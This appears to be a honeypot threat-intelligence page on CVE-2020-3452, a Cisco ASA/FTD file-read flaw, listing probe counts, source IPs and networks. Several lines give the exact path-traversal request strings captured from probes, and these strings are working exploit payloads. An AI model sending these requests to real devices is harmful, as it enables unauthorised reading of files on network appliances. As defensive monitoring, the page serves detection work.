CVE-2020-3452: Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion

HoneyLabs honeypots recorded 17 probes matching CVE-2020-3452 from 6 distinct source IP addresses in the last 7 days. Severity is rated high.

This CVE is on CISA's Known Exploited Vulnerabilities list.

Request paths that identify it

  • /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
  • /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=..

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.21412Techoff Srv LimitedBulgaria
45.79.2.1831Akamai Connected CloudUnited States
167.99.169.2501DigitalOcean, LLCUnited States
165.232.60.751DigitalOcean, LLCUnited States
64.227.1.151DigitalOcean, LLCUnited States
206.189.73.1301DigitalOcean, LLCUnited States

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited121
AS14061DigitalOcean, LLC44
AS63949Akamai Connected Cloud11

Captured requests

  • /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
  • /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
  • /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2BCSCOE%2B/portal_inc.lua

CVE report

CVE report

Open a specific CVE from the CVE tracker.